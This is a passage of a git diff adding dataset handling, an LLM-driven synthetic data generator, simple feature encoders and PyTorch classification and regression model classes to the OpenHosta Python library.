+ return self._create_dataloaders(dataset, batch_size, shuffle, train_set_size)
+
+ def save_data(self, file_path: str):
+ """
+        Save the dataset in JSON format.
+ """
+ data_to_save = {
+ 'data': [
+ {
+ '_inputs': sample.input.tolist() if isinstance(sample.input, torch.Tensor) else sample.input,
+ '_outputs': sample.output.tolist() if isinstance(sample.output, torch.Tensor) else sample.output
+ }
+ for sample in self.data
+ ]
+ }
+ with open(file_path, 'w') as f:
+ json.dump(data_to_save, f)
+
+ def load_data(self, file_path: str):
+ """
+        Load a dataset from a JSON file.
+ """
+ with open(file_path, 'r') as f:
+ data_dict = json.load(f)
+
+ for sample_dict in data_dict['data']:
+ self.add(Sample(sample_dict))
+
+ def _create_dataloaders(self, dataset, batch_size: int, shuffle: bool, train_set_size: float):
+ """
+        Utility method to create the train/validation dataloaders.
+ """
+ train_size = int(train_set_size * len(dataset))
+
+ train_dataset = torch.utils.data.Subset(dataset, range(train_size))
+ val_dataset = torch.utils.data.Subset(dataset, range(train_size, len(dataset)))
+
+ return (
+ torch.utils.data.DataLoader(train_dataset, batch_size=batch_size, shuffle=shuffle),
+ torch.utils.data.DataLoader(val_dataset, batch_size=batch_size, shuffle=False)
+ )
+
+
+ @staticmethod
+ def from_data(data_path: str, batch_size: int, shuffle: bool, train_set_size: float = 0.8, verbose: int = 1) -> tuple:
+ """
+ Load a dataset from a file and convert it into dataloader for training.
+ """
+ dataset = HostaDataset(verbose)
+ dataset.load_data(data_path)
+ return dataset.convert_data(batch_size, shuffle, train_set_size)
+
+
+ def save(self, path: str, source_type: SourceType = SourceType.CSV, elements: Optional[List[Sample]] = None):
+ """
+ Save the dataset or specific elements to a file in the specified format.
+ Converts Sample objects back to dictionaries for storage.
+
+ Args:
+ path: Path where to save the file
+            source_type: Type of file format to save (CSV or JSONL)
+ elements: Optional list of Sample objects to save. If None, saves entire dataset
+ """
+ self.path = path
+ data_to_save = elements if elements is not None else self.data
+
+ # Convert Samples to dictionaries for saving
+ dict_data = []
+ for sample in data_to_save:
+ sample_dict = {}
+ for i, input_value in enumerate(sample.input):
+ sample_dict[f'input_{i}'] = input_value
+ if sample.output is not None:
+ sample_dict['_outputs'] = sample.output
+ dict_data.append(sample_dict)
+
+ if source_type == SourceType.CSV:
+ with open(path, 'w', newline='', encoding='utf-8') as f:
+ if not dict_data:
+ return
+ writer = csv.DictWriter(f, fieldnames=dict_data[0].keys())
+ writer.writeheader()
+ writer.writerows(dict_data)
+
+ elif source_type == SourceType.JSONL:
+ with open(path, 'w', encoding='utf-8') as f:
+ for row in dict_data:
+ json.dump(row, f)
+ f.write('\n')
+
+ else:
+ raise ValueError(f"Unsupported source type: {source_type}")
+
+ def convert_files(self, path: str, source_type: Optional[SourceType] = None) -> List[Sample]:
+ """
+ Load dataset from a file and convert each row to a Sample object.
+
+ Args:
+ path: Path to the source file
+            source_type: Type of file to load (CSV or JSONL)
+
+ Returns:
+            List[Sample]: the loaded samples (also stored in self.data)
+ """
+ if not os.path.exists(path):
+ raise FileNotFoundError(f"File not found: {path}")
+        self.path = path  # Save the path for easy access later
+
+ if source_type is None:
+ if path.endswith('.csv'):
+ source_type = SourceType.CSV
+ elif path.endswith('.jsonl'):
+ source_type = SourceType.JSONL
+ else:
+ raise ValueError(f"Please specify the source type for the file: {path}")
+
+ if source_type == SourceType.CSV:
+ with open(path, 'r') as f:
+ reader = csv.DictReader(f)
+ for row in reader:
+ # Convert string numbers to float if possible
+ processed_row = {}
+ for key, value in row.items():
+ try:
+ processed_row[key] = float(value)
+ except ValueError:
+ processed_row[key] = value
+ self.data.append(Sample(processed_row))
+
+ elif source_type == SourceType.JSONL:
+ with open(path, 'r') as f:
+ for line in f:
+ record = json.loads(line)
+ if not isinstance(record, dict):
+ record = {'input_0': record}
+ self.data.append(Sample(record))
+
+ else:
+ raise ValueError(f"Unsupported source type: {source_type}")
+ return self.data
+
+ def convert_list(self, data: list) -> List[Sample]:
+ """
+ Create a dataset from a list.
+
+ Args:
+ data: List of dictionaries or tuples/lists representing Sample _inputs and _outputs.
+ Each item should either be:
+ - a dict with keys for _inputs (e.g., 'input_0', 'input_1', ...) and optional '_outputs', or
+ - a tuple/list where the first part is _inputs(s) and the last item is _outputs (optional).
+
+ Returns:
+ HostaDataset instance
+ """
+
+ for entry in data:
+ if isinstance(entry, dict):
+ # If the entry is already a dictionary, let's assume it has the keys in the right structure
+ self.add(Sample(entry))
+ elif isinstance(entry, (list, tuple)):
+ # If it's a list or tuple, we assume it's structured as (_inputs..., [_outputs])
+ inputs = list(entry[:-1]) # All but last element are _inputs
+ output = entry[-1] if len(entry) > 1 else None # Last element could be _outputs if present
+ sample_dict = {f'input_{i}': input_value for i, input_value in enumerate(inputs)}
+ if output is not None:
+ sample_dict['_outputs'] = output
+ self.add(Sample(sample_dict))
+ else:
+ raise ValueError(f"Unsupported data format in list entry: {entry}")
+
+ def encode(self, max_tokens: int) -> None:
+ """
+        Encode the training dataset and build the token dictionary.
+ """
+ if self._encoder is None:
+ self._encoder = SimpleEncoder()
+ self.data = self._encoder.encode(self.data, max_tokens=max_tokens)
+ self.dictionary = self._encoder.dictionary
+
+ def encode_inference(self) -> None:
+ """
+        Encode the inference data using the existing dictionary.
+ """
+ if self.dictionary is None:
+ raise ValueError("No dictionary available. Call encode() first on training data")
+
+ self._encoder = SimpleEncoder(existing_dict=self.dictionary)
+ self.inference = self._encoder.encode([self.inference], max_tokens=10)[0]
+
+ def tensorify(self, dtype=None) -> None:
+ """
+        Convert the training dataset to tensors.
+ """
+ if dtype is None:
+ dtype = torch.float32
+
+ for sample in self.data:
+ if not isinstance(sample.input, torch.Tensor):
+ sample._inputs = torch.tensor(sample.input, dtype=dtype)
+
+            if sample.output is not None and not isinstance(sample.output, torch.Tensor):
+                sample._outputs = torch.tensor(sample.output, dtype=dtype)
+
+ def tensorify_inference(self, dtype=None) -> None:
+ """
+        Convert the inference data to tensors.
+ """
+ if dtype is None:
+ dtype = torch.float32
+
+ if not isinstance(self.inference.input, torch.Tensor):
+ self.inference._inputs = torch.tensor(self.inference.input, dtype=dtype)
+
+ def prepare_inference(self, inference_data: dict) -> None:
+ """
+        Prepare the inference data by encoding it and converting it to tensors.
+ """
+ self.inference = Sample(inference_data)
+ self.encode_inference()
+ self.tensorify_inference()
+
+ @staticmethod
+ def from_input(inference_data: dict, verbose: int = 0) -> 'HostaDataset':
+ """
+        Create a dataset from inference data.
+ """
+ dataset = HostaDataset(verbose)
+ dataset.prepare_inference(inference_data)
+ return dataset
+
+ def decode(self, predictions: List[Any], func_f_type: Any) -> List[Any]:
+ """
+ Decode the model predictions based on the function's return type.
+ """
+ if self._encoder is None:
+ raise ValueError("Dataset must be encoded before decoding")
+
+ # Check if func_f_type is a typing.Literal
+ # if isinstance(func_f_type, typing._GenericAlias) and get_origin() is Literal:
+
+ # if get_origin(func_f_type) is Literal:
+ # Return decoded predictions using the encoder
+ # return [self._encoder.decode_prediction(pred) for pred in predictions]
+ # else:
+ decoded_predictions = []
+ for pred in predictions:
+ pred_value = pred.detach().cpu().numpy()
+ # Convert pred_value to the expected type
+ # Handle scalar and array predictions
+ if pred_value.size == 1:
+ pred_scalar = pred_value.item()
+ else:
+ pred_scalar = pred_value
+ try:
+ converted_pred = func_f_type(pred_scalar)
+ except (TypeError, ValueError):
+ converted_pred = pred_scalar # Return as is if conversion fails
+ decoded_predictions.append(converted_pred)
+ if func_f_type != list:
+ decoded_predictions = decoded_predictions[0]
+ return decoded_predictions
+
+ @staticmethod
+ def from_files(path: str, source_type: Optional[SourceType], verbose: int = 1) -> 'HostaDataset':
+ """
+ Load a dataset from a file.
+ """
+ dataset = HostaDataset(verbose)
+ dataset.convert_files(path, source_type)
+ return dataset
+
+ @staticmethod
+ def from_list(data: list, verbose: int) -> 'HostaDataset':
+ """
+ Create a dataset from a list.
+ """
+ dataset = HostaDataset(verbose)
+ dataset.convert_list(data)
+ return dataset
+
+
+    def __len__(self):
+        return len(self.data)
+
+ def __iter__(self):
+ return iter(self.data)
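The `(*inputs, output)` tuple convention that `convert_list` expects can be sketched in isolation. This is a minimal, illustrative re-statement of the intended mapping (treating a lone element as an input); the helper name is not part of the library API:

```python
def tuple_to_sample_dict(entry):
    """Map a (*inputs, output) tuple to the dict layout Sample expects."""
    if len(entry) > 1:
        inputs, output = list(entry[:-1]), entry[-1]
    else:
        # a single-element entry carries one input and no output
        inputs, output = list(entry), None
    sample = {f"input_{i}": v for i, v in enumerate(inputs)}
    if output is not None:
        sample["_outputs"] = output
    return sample
```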
diff --git a/src/OpenHosta/exec/predict/dataset/oracle.py b/src/OpenHosta/exec/predict/dataset/oracle.py
new file mode 100644
index 0000000..abccebd
--- /dev/null
+++ b/src/OpenHosta/exec/predict/dataset/oracle.py
@@ -0,0 +1,220 @@
+import inspect
+from typing import Optional, Dict, Any, List, Type, Union, get_args, Literal
+
+from ....core.config import Model, DefaultManager
+from ....core.hosta import Func
+
+_PROMPT = "{func_name}{signature}:\n \"\"\"{docstring}\"\"\"\n\nIMPORTANT RULES:\n1. Input values should respect the type hints\n2. Output values MUST be diverse - avoid generating the same output repeatedly\n3. Each row must be in CSV format\n4. For text outputs, enclose them in double quotes\n5. NO MORE THAN 20% of outputs should be the same value\n6. Generate inputs across the entire possible range\n7. Ensure proper formatting for {return_type} output type"
+
+
+
+class LLMSyntheticDataGenerator:
+ """Generates synthetic data using a Language Model."""
+
+
+ @staticmethod
+ def _validate_row(row: str, expected_fields: List[Type]) -> Optional[List[Union[str, float]]]:
+ try:
+ values = row.strip().split(',')
+
+ if len(values) != len(expected_fields):
+ return None
+
+ result = []
+
+ for value, expected_type in zip(values, expected_fields):
+ if expected_type == str:
+ result.append(value)
+
+ elif expected_type == float:
+ result.append(float(value))
+
+                elif expected_type == int:
+                    result.append(int(float(value)))  # Convert to integer (via float so "3.0" parses)
+
+ elif expected_type == bool:
+ if value.lower() == "true":
+ result.append(True)
+ elif value.lower() == "false":
+ result.append(False)
+ else:
+ return None
+
+ elif getattr(expected_type, '__origin__', None) is Literal:
+ valid_literals = get_args(expected_type)
+ if value in valid_literals:
+ result.append(value)
+ else:
+ return None # Invalid Literal
+
+ elif getattr(expected_type, '__origin__', None) is Union and type(None) in get_args(expected_type):
+ non_none_types = [t for t in get_args(expected_type) if t is not type(None)]
+ for t in non_none_types:
+ if t == int:
+ try:
+ result.append(int(value))
+ break
+ except ValueError:
+ continue
+ elif t == float:
+ try:
+ result.append(float(value))
+ break
+ except ValueError:
+ continue
+ elif t == str:
+ result.append(value)
+ break
+ else:
+ return None
+ else:
+ return None
+ return result
+ except (ValueError, TypeError):
+ return None
+
+ @staticmethod
+ def _format_example(input_val: Any, output_val: Any) -> str:
+ """
+        Format a single example based on its input/output types.
+ """
+ if isinstance(input_val, (list, tuple)):
+ input_str = ','.join(map(str, input_val))
+ else:
+ input_str = str(input_val)
+
+        if isinstance(output_val, str):
+            output_str = f'"{output_val}"'  # Enclose strings in double quotes
+ else:
+ output_str = str(output_val)
+
+ return f"{input_str},{output_str}"
+
+ @staticmethod
+ def _build_user_prompt(
+ examples: List[Dict],
+ func: Func,
+ output_type: Type,
+ examples_in_req: int,
+ ):
+ user_prompt = ""
+
+        if examples:
+            user_prompt += "\nReference examples (Input → Output):\n"
+            for ex in examples:
+                input_vals = [v for k, v in ex.items() if k != "_outputs"]
+                user_prompt += f"{LLMSyntheticDataGenerator._format_example(input_vals, ex.get('_outputs'))}\n"
+
+ user_prompt += f"\n\nGenerate {examples_in_req} new DIVERSE _inputs-_outputs pairs, one per line, in CSV format"
+ if output_type == str:
+ user_prompt += " (remember to enclose string _outputs in quotes ex: \"_outputs\")"
+ user_prompt += ":\n"
+
+ user_prompt += f"{','.join(func.f_sig.parameters.keys())},_outputs"
+ user_prompt += f"\n{','.join([str(f"\n- {a} is type {b.annotation.__name__ if b.annotation != inspect.Parameter.empty else 'Any'}")\
+ for a, b in func.f_sig.parameters.items()])}\n"
+ user_prompt += f"- _outputs is type {output_type.__name__}\n"
+
+ return user_prompt
+
+
+ @staticmethod
+ def generate_synthetic_data(
+ func: Func, # The function to generate data for
+ request_amounts: int = 3, # Amount of requests to the model
+ examples_in_req: int = 50, # Examples amount in each request
+ model: Optional[Model] = None # Model to use for data generation
+ ) -> List[Dict]:
+ input_types: Dict[str, Type] = dict(zip(func.f_args.keys(), func.f_type[0]))
+ output_type: Type = func.f_type[1]
+ examples: List[Dict] = []
+        if func.f_mem:
+            for ex in func.f_mem:
+                ex_inputs = list(ex.value["in_"].values())
+                ex_output = ex.value["out"]
+                to_append = {}
+                for i, key in enumerate(input_types.keys()):
+                    to_append[key] = ex_inputs[i]
+                to_append["_outputs"] = ex_output
+                examples.append(to_append)
+
+ if not model:
+ model = DefaultManager.get_default_model()
+
+ try:
+ assert input_types and len(input_types) > 0, "Input types must be provided."
+ assert output_type, "Output type must be provided."
+ assert request_amounts > 0, "Request amount must be greater than 0."
+ assert examples_in_req > 0, "Examples amount in each request must be greater than 0."
+ assert model, "Model must be provided."
+ except AssertionError as e:
+ raise ValueError(f"Invalid parameters: {e}")
+
+ prompt: str = (
+ _PROMPT
+ .replace("{func_name}", func.f_name)
+ .replace("{signature}", str(func.f_sig))
+ .replace("{docstring}", func.f_doc)
+ )
+ prompt += LLMSyntheticDataGenerator._build_user_prompt(examples, func, output_type, examples_in_req)
+
+ generated_data: List = []
+ result: List[Dict] = []
+ conversation_history: List = []
+ attempts = 0
+ expected_fields = len(input_types) + 1
+
+ conversation_history.append({
+ "role": "system",
+ "content": "You are a data generation assistant focused on creating diverse, realistic data. Avoid repetitive patterns."
+ })
+
+ while attempts < request_amounts:
+ try:
+ content = prompt
+
+ # Add information about already generated data
+ if generated_data:
+ already_generated = "\nAlready generated data (please avoid these exact combinations):\n"
+ for row in generated_data:
+ already_generated += f"{','.join(map(str, row))}\n"
+ content += already_generated
+
+ # Add the user message to conversation history
+ conversation_history.append({
+ "role": "user",
+ "content": content
+ })
+
+ response = model.api_call(
+ messages=conversation_history,
+ temperature=1.0,
+ json_form=False,
+ )
+
+ # Add the assistant's response to conversation history
+ conversation_history.append({
+ "role": "assistant",
+ "content": response["choices"][0]["message"]["content"]
+ })
+
+ rows = response["choices"][0]["message"]["content"].strip().split('\n')
+
+ for row in rows:
+ cleaned_row = LLMSyntheticDataGenerator._validate_row(row, list(input_types.values()) + [output_type])
+ if cleaned_row:
+ if cleaned_row not in generated_data:
+ dictrow = dict(zip(input_types.keys(), cleaned_row[:-1]))
+ dictrow["_outputs"] = cleaned_row[-1]
+ result.append(dictrow)
+ generated_data.append(cleaned_row)
+
+ # Keep conversation history manageable by keeping only last 10 messages
+ if len(conversation_history) > 10:
+ # Always keep the system message
+ conversation_history = [conversation_history[0]] + conversation_history[-9:]
+
+ except Exception as e:
+ print(f"Error during generation: {e} line {e.__traceback__.tb_lineno}")
+
+ attempts += 1
+
+ return result
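The row-validation idea above — split a CSV line and coerce each field to its declared type, rejecting the whole row on any mismatch — can be sketched without the `Literal`/`Optional` cases. A simplified, illustrative version:

```python
def validate_row(row, expected_types):
    """Return the typed fields of a CSV row, or None if the row is invalid."""
    values = row.strip().split(",")
    if len(values) != len(expected_types):
        return None  # wrong field count
    out = []
    for value, t in zip(values, expected_types):
        try:
            if t is bool:
                # booleans must be spelled out; anything else is a mismatch
                if value.lower() not in ("true", "false"):
                    return None
                out.append(value.lower() == "true")
            else:
                out.append(t(value))
        except (TypeError, ValueError):
            return None
    return out
```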
diff --git a/src/OpenHosta/exec/predict/dataset/sample_type.py b/src/OpenHosta/exec/predict/dataset/sample_type.py
new file mode 100644
index 0000000..67277db
--- /dev/null
+++ b/src/OpenHosta/exec/predict/dataset/sample_type.py
@@ -0,0 +1,67 @@
+from typing import List, Any, Optional
+
+# from pydantic import BaseModel
+
+
+class Sample:
+ """
+ A class to handle data samples for machine learning.
+    Expects a dictionary where all keys except '_outputs' are treated as inputs.
+
+ Example:
+ data = {
+ 'feature1': [1, 2], # Any key except '_outputs' is considered _inputs
+ 'feature2': {'a': 3}, # Can contain any nested structure
+ 'feature3': 4, # Can contain any primitive type
+ 'feature4': BaseModel(), # Can contain Pydantic models
+ '_outputs': 9 # Optional _outputs
+ }
+ sample = Sample(data)
+ """
+
+ def __init__(self, data: dict):
+ if not isinstance(data, dict):
+ raise TypeError("Data must be a dictionary")
+
+ self._inputs: List[Any] = []
+ self._outputs: Optional[Any] = None
+
+        output_data = data.get('_outputs', None)
+        if output_data is not None:
+            output_flattened = self._flatten_data(output_data)
+            self._outputs = output_flattened[0] if len(output_flattened) == 1 else output_flattened
+
+        # Iterate without popping so the caller's dict is not mutated
+        for key, value in data.items():
+            if key != '_outputs':
+                self.input.extend(self._flatten_data(value))
+
+ def _flatten_data(self, data: Any) -> List[Any]:
+ """
+ Flatten any nested data structure into a list.
+ Handles: BaseModel, dict, list/tuple, primitive types
+ """
+ # if isinstance(data, BaseModel):
+ # return self._flatten_data(data.model_dump())
+ if isinstance(data, dict):
+ result = []
+ for value in data.values():
+ result.extend(self._flatten_data(value))
+ return result
+ if isinstance(data, (list, tuple)):
+ result = []
+ for item in data:
+ result.extend(self._flatten_data(item))
+ return result
+ return [data]
+
+ @property
+ def input(self) -> List[Any]:
+ """Get the _inputs features"""
+ return self._inputs
+
+ @property
+ def output(self) -> Optional[Any]:
+ """Get the _outputs label (None if no _outputs was provided)"""
+ return self._outputs
+
+ def __repr__(self) -> str:
+ return f"Sample(_inputs={self.input}, _outputs={self.output})"
diff --git a/src/OpenHosta/exec/predict/encoder/__init__.py b/src/OpenHosta/exec/predict/encoder/__init__.py
new file mode 100644
index 0000000..e69de29
diff --git a/src/OpenHosta/exec/predict/encoder/base_encoder.py b/src/OpenHosta/exec/predict/encoder/base_encoder.py
new file mode 100644
index 0000000..b052f40
--- /dev/null
+++ b/src/OpenHosta/exec/predict/encoder/base_encoder.py
@@ -0,0 +1,13 @@
+from abc import ABC, abstractmethod
+from typing import Union,Any
+
+class BaseEncoder(ABC):
+ @abstractmethod
+ def encode(self, data: Any) -> Union[int, float]:
+ """Encode a single value"""
+ pass
+
+ @abstractmethod
+ def decode(self, encoded_value: Any) -> Any:
+ """Decode a prediction back to its original type"""
+ pass
diff --git a/src/OpenHosta/exec/predict/encoder/simple_encoder.py b/src/OpenHosta/exec/predict/encoder/simple_encoder.py
new file mode 100644
index 0000000..a738320
--- /dev/null
+++ b/src/OpenHosta/exec/predict/encoder/simple_encoder.py
@@ -0,0 +1,126 @@
+from typing import List, Any, Dict, Union
+
+from .base_encoder import BaseEncoder
+from ..dataset.sample_type import Sample
+
+
+class NumericEncoder(BaseEncoder):
+ def encode(self, value: Union[int, float]) -> float:
+ return float(value)
+
+ def decode(self, encoded_value: float) -> Union[int, float]:
+ return encoded_value
+
+class BooleanEncoder(BaseEncoder):
+ def encode(self, value: bool) -> int:
+ return int(value)
+
+ def decode(self, encoded_value: int) -> bool:
+ return bool(encoded_value)
+
+class StringEncoder(BaseEncoder):
+ def __init__(self, existing_dict: Dict[str, int] = None):
+ """
+ Initialize with optional existing dictionary.
+ If existing_dict is provided, we're in inference mode.
+ """
+ self.inference_mode = existing_dict is not None
+ self.word_to_id = {'<UNK>': 0} if existing_dict is None else existing_dict
+ self.id_to_word = {v: k for k, v in self.word_to_id.items()}
+ self.next_id = max(self.word_to_id.values()) + 1 if self.word_to_id else 1
+ self.max_tokens = None
+
+ def set_max_tokens(self, max_tokens: int):
+ """Set maximum length for encoded sequences"""
+ self.max_tokens = max_tokens
+
+ def encode(self, value: str) -> List[int]:
+ """
+ Encode a string into a list of integers.
+        For classification (output labels), a single integer is kept downstream.
+        For input features, returns a list of integers of length max_tokens.
+ """
+ if self.max_tokens is None:
+ raise ValueError("max_tokens must be set before encoding")
+
+ words = str(value).lower().strip().split()
+ encoded = []
+
+ for word in words:
+ if not self.inference_mode and word not in self.word_to_id:
+ self.word_to_id[word] = self.next_id
+ self.id_to_word[self.next_id] = word
+ self.next_id += 1
+ encoded.append(self.word_to_id.get(word, 0))
+
+ if len(encoded) > self.max_tokens:
+ return encoded[:self.max_tokens]
+ return encoded + [0] * (self.max_tokens - len(encoded))
+
+ def decode(self, encoded_value: Union[int, List[int]]) -> str:
+ """
+ Decode either a single integer (classification) or list of integers (features)
+ """
+ if isinstance(encoded_value, (int, float)):
+ return self.id_to_word.get(int(encoded_value), '<UNK>')
+
+ words = []
+ for idx in encoded_value:
+ if idx != 0: # Skip padding
+ words.append(self.id_to_word.get(idx, '<UNK>'))
+ return ' '.join(words)
+
+class SimpleEncoder:
+ def __init__(self, existing_dict: Dict[str, int] = None):
+ self.string_encoder = StringEncoder(existing_dict)
+ self.feature_types = {}
+ self.encoders = {
+ str: self.string_encoder,
+ int: NumericEncoder(),
+ float: NumericEncoder(),
+ bool: BooleanEncoder()
+ }
+
+ def encode(self, samples: List[Sample], max_tokens: int) -> List[Sample]:
+ self.string_encoder.set_max_tokens(max_tokens)
+
+ encoded_samples = []
+ for sample in samples:
+ encoded_input = []
+ for idx, value in enumerate(sample.input):
+ encoder = self.encoders[type(value)]
+ self.feature_types[idx] = type(value)
+ encoded_value = encoder.encode(value)
+ if isinstance(encoded_value, list):
+ encoded_input.extend(encoded_value)
+ else:
+ encoded_input.append(encoded_value)
+
+ encoded_output = None
+ if sample.output is not None:
+ if isinstance(sample.output, str):
+ print("\033[93mWarning: Multiple string _outputs not supported, only using the first word will be used for _outputs\033[0m")
+ output_idx = len(sample.input)
+ encoder = self.encoders[type(sample.output)]
+ self.feature_types[output_idx] = type(sample.output)
+ encoded_output = encoder.encode(sample.output)
+                # Multi-word string outputs are not supported; keep only the first token
+ if isinstance(encoded_output, list):
+ encoded_output = encoded_output[0]
+
+ encoded_samples.append(Sample({
+ '_inputs': encoded_input,
+ '_outputs': encoded_output
+ }))
+
+ return encoded_samples
+
+ def decode_prediction(self, prediction: Any, position: int) -> Any:
+ if position not in self.feature_types:
+ raise ValueError(f"Unknown feature position: {position}")
+
+ return self.encoders[self.feature_types[position]].decode(prediction)
+
+ @property
+ def dictionary(self) -> Dict[str, int]:
+ return self.string_encoder.word_to_id
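The word-to-id scheme behind `StringEncoder` can be summarized compactly: id 0 is reserved for `<UNK>`/padding, new words receive increasing ids during training, and every encoded sequence is truncated or zero-padded to `max_tokens`. A minimal sketch (helper name is illustrative):

```python
def encode_words(text, word_to_id, max_tokens, train=True):
    """Encode a string as fixed-length word ids; 0 is <UNK>/padding."""
    encoded = []
    for word in text.lower().strip().split():
        if train and word not in word_to_id:
            word_to_id[word] = len(word_to_id)  # assign the next free id
        encoded.append(word_to_id.get(word, 0))  # unknown words map to 0
    encoded = encoded[:max_tokens]
    return encoded + [0] * (max_tokens - len(encoded))
```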
diff --git a/src/OpenHosta/exec/predict/model/__init__.py b/src/OpenHosta/exec/predict/model/__init__.py
new file mode 100644
index 0000000..92fbcca
--- /dev/null
+++ b/src/OpenHosta/exec/predict/model/__init__.py
@@ -0,0 +1,9 @@
+from .hosta_model import HostaModel
+from .model_provider import HostaModelProvider
+from .neural_network_types import ArchitectureType
+
+__all__ = (
+ 'ArchitectureType',
+ 'HostaModel',
+ 'HostaModelProvider',
+)
\ No newline at end of file
diff --git a/src/OpenHosta/exec/predict/model/builtins/__init__.py b/src/OpenHosta/exec/predict/model/builtins/__init__.py
new file mode 100644
index 0000000..e69de29
diff --git a/src/OpenHosta/exec/predict/model/builtins/classification.py b/src/OpenHosta/exec/predict/model/builtins/classification.py
new file mode 100644
index 0000000..d08aabd
--- /dev/null
+++ b/src/OpenHosta/exec/predict/model/builtins/classification.py
@@ -0,0 +1,146 @@
+### NOT IMPLEMENTED YET ###
+
+from typing import Optional
+
+import torch
+from torch import nn
+from torch import optim
+
+from ..hosta_model import HostaModel
+from ..neural_network import NeuralNetwork
+from .....utils.torch_nn_utils import custom_optimizer_to_pytorch, custom_loss_to_pytorch, custom_layer_to_pytorch
+
+
+class Classification(HostaModel):
+ def __init__(self, neural_network: Optional[NeuralNetwork], input_size: int, output_size: int, complexity: int, num_classes: int, device: Optional[str] = None):
+ super().__init__(device)
+
+ self.complexity = complexity
+ self.num_classes = num_classes
+ self.verbose = True
+ self.layers = []
+ if neural_network is None or neural_network.layers is None or len(neural_network.layers) == 0:
+ transition_value = int(((input_size * output_size) / 2) * self.complexity)
+
+ input_layer = int(input_size * (2 * self.complexity))
+ if input_size > output_size:
+ hidden_layer_1 = int(transition_value / output_size)
+ else:
+ hidden_layer_1 = transition_value
+
+ # Define simple fully connected architecture
+ self.layers.append(nn.Linear(input_size, input_layer))
+ self.layers.append(nn.ReLU()) # Apply ReLU after first layer
+ self.layers.append(nn.Linear(input_layer, hidden_layer_1))
+ self.layers.append(nn.ReLU()) # Apply ReLU after second layer
+ self.layers.append(nn.Linear(hidden_layer_1, output_size))
+ else:
+ # Use custom user-defined layers from neural network definition if available
+ self.layers = [custom_layer_to_pytorch(layer) for layer in neural_network.layers]
+
+ for i, layer in enumerate(self.layers):
+ setattr(self, f'fc{i + 1}', layer)
+
+ # Set the loss function for classification
+ if neural_network is None or neural_network.loss_function is None:
+ if num_classes == 2:
+ self.loss = nn.BCEWithLogitsLoss() # For binary classification
+ else:
+ self.loss = nn.CrossEntropyLoss() # For multi-class classification
+ else:
+ self.loss = custom_loss_to_pytorch(neural_network.loss_function)
+
+ # Set the optimizer
+ if neural_network is None or neural_network.optimizer is None:
+ self.optimizer = optim.Adam(self.parameters(), lr=0.001)
+ else:
+ self.optimizer = custom_optimizer_to_pytorch(neural_network.optimizer, self, lr=0.001)
+
+ # Move model to the selected device (CPU or GPU)
+ self.to(self.device)
+
+
+ def trainer(self, train_set, epochs):
+ self.train()
+
+ for epoch in range(epochs):
+ running_loss = 0.0
+ correct = 0
+ total = 0
+ for inputs, labels in train_set:
+ inputs, labels = inputs.to(self.device), labels.to(self.device)
+
+ # Zero parameter gradients
+ self.optimizer.zero_grad()
+
+ # Forward pass
+ outputs = self(inputs)
+
+ if self.num_classes == 2:
+ preds = (torch.sigmoid(outputs) > 0.5).float()
+ else:
+ preds = torch.argmax(outputs, dim=1)
+
+ # Compute Loss
+ loss = self.loss(outputs, labels)
+ loss.backward()
+ self.optimizer.step()
+
+ running_loss += loss.item()
+
+ # Calculate accuracy
+ if self.num_classes == 2:
+ correct += (preds == labels).sum().item()
+ else:
+ correct += (preds == labels.argmax(dim=1)).sum().item()
+
+ total += labels.size(0)
+
+ accuracy = correct / total
+ if self.verbose:
+ print(f"Epoch {epoch + 1}/{epochs}, Loss: {running_loss / len(train_set):.4f}, Accuracy: {accuracy * 100:.2f}%")
+
+ def validate(self, validation_set):
+ """Validate the model's performance"""
+ self.eval() # Set model to evaluation mode
+ validation_loss = 0.0
+ correct = 0
+ total = 0
+ with torch.no_grad():
+ for inputs, labels in validation_set:
+ inputs, labels = inputs.to(self.device), labels.to(self.device)
+ outputs = self(inputs)
+
+ loss = self.loss(outputs, labels)
+ validation_loss += loss.item()
+
+ # For Classification Metrics (like binary or multi-class accuracy)
+ if self.num_classes == 2:
+ # Binary classification: Apply sigmoid and threshold at 0.5
+ preds = (torch.sigmoid(outputs) > 0.5).float()
+ correct += (preds == labels).sum().item()
+ else:
+ # Multi-class classification: Use argmax to get class labels
+                    preds = torch.argmax(outputs, dim=1)
+ correct += (preds == labels.argmax(dim=1)).sum().item()
+
+ total += labels.size(0)
+
+ avg_val_loss = validation_loss / len(validation_set)
+ accuracy = correct / total
+ print(f"Validation Loss: {avg_val_loss:.4f}, Accuracy: {accuracy * 100:.2f}%")
+
+ return avg_val_loss, accuracy
+
+
+ def inference(self, x):
+ """Make prediction on a _inputs inference the model"""
+ self.eval()
+ with torch.no_grad():
+ x = x.to(self.device)
+ outputs = self(x)
+ if self.num_classes == 2:
+ prediction = (torch.sigmoid(outputs) > 0.5).float()
+ else:
+ prediction = torch.softmax(outputs, dim=1)
+ return prediction.cpu()
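The decision rules above can be reproduced without torch for a single example: binary classification thresholds a sigmoid at 0.5, multi-class takes the argmax of the logits. This is a simplified sketch (the real code operates on batched tensors):

```python
import math

def predict(logits, num_classes):
    """Binary: sigmoid-threshold a single score; multi-class: argmax of logits."""
    if num_classes == 2:
        # logits is a single raw score here
        return 1.0 if 1 / (1 + math.exp(-logits)) > 0.5 else 0.0
    return max(range(len(logits)), key=lambda i: logits[i])
```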
diff --git a/src/OpenHosta/exec/predict/model/builtins/linear_regression.py b/src/OpenHosta/exec/predict/model/builtins/linear_regression.py
new file mode 100644
index 0000000..9838899
--- /dev/null
+++ b/src/OpenHosta/exec/predict/model/builtins/linear_regression.py
@@ -0,0 +1,97 @@
+from typing import Optional
+
+import torch
+from torch import nn
+from torch import optim
+
+from ..hosta_model import HostaModel
+from ..neural_network import NeuralNetwork
+from .....utils.torch_nn_utils import custom_optimizer_to_pytorch, custom_loss_to_pytorch, custom_layer_to_pytorch
+
+
+class LinearRegression(HostaModel):
+ def __init__(self, neural_network: Optional[NeuralNetwork], input_size: int, output_size: int, complexity: int, device: Optional[str] = None):
+ super().__init__(device)
+
+ self.complexity = complexity
+
+ self.layers = []
+ if neural_network is None or neural_network.layers is None or len(neural_network.layers) == 0:
+ transition_value = int(((input_size * output_size) / 2) * self.complexity)
+
+ input_layer = int(input_size * (2 * self.complexity))
+ if input_size > output_size:
+ hidden_layer_1 = int(transition_value / output_size)
+ else:
+ hidden_layer_1 = transition_value
+
+ self.layers.append(nn.Linear(input_size, input_layer))
+ self.layers.append(nn.ReLU())
+ self.layers.append(nn.Linear(input_layer, hidden_layer_1))
+ self.layers.append(nn.ReLU())
+ self.layers.append(nn.Linear(hidden_layer_1, output_size))
+ else:
+ self.layers = [custom_layer_to_pytorch(layer) for layer in neural_network.layers]
+
